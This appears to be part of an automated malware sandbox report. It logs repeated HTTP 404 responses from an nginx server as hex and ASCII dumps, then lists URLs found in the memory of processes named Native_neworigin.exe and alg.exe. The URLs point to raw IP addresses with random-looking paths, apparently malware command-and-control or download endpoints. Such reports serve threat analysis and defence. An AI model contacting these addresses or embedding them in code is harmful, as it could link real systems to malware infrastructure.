68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 26 Nov 2024 07:14:44 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 26 Nov 2024 07:14:55 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 26 Nov 2024 07:14:57 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 26 Nov 2024 07:15:01 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 26 Nov 2024 07:15:01 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 26 Nov 2024 07:15:12 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 26 Nov 2024 07:15:13 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 26 Nov 2024 07:15:43 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 26 Nov 2024 07:15:43 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 26 Nov 2024 07:15:47 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 26 Nov 2024 07:15:48 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                    Source: Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.143/kgrfegimyutt~
                    Source: Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.143/mbuec
                    Source: Native_neworigin.exe, 0000000D.00000002.1778812791.00000000053C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.2I
                    Source: Native_neworigin.exe, 0000000D.00000002.1667563278.00000000007C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/
                    Source: Native_neworigin.exe, 0000000D.00000002.1667563278.00000000007FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/1
                    Source: alg.exe, 00000011.00000003.1712152929.0000000000678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/aatpwqmmnwrfjm
                    Source: Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/nkbiquv
                    Source: Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/nkbiquvf=
                    Source: Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/nkbiquvo
                    Source: Native_neworigin.exe, 0000000D.00000002.1789264560.0000000006AC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/qmpy
                    Source: Native_neworigin.exe, 0000000D.00000002.1667563278.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/qmpyC
                    Source: alg.exe, 00000011.00000003.1561795732.000000000065D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/eupqxdgegqjrgdpvd
                    Source: Native_neworigin.exe, 0000000D.00000002.1789264560.0000000006AC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/qmpy/
                    Source: alg.exe, 00000011.00000003.1523918107.000000000063F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/
                    Source: alg.exe, 00000011.00000003.1523918107.000000000063F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/d
                    Source: Native_neworigin.exe, 0000000D.00000003.1569284648.0000000005392000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/irvq
                    Source: alg.exe, 00000011.00000003.1523918107.000000000063F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/ulvxycyjutwdmypq
                    Source: alg.exe, 00000011.00000003.1532040197.000000000065F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000011.00000003.1523809233.000000000065E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/ulvxycyjutwdmypq5
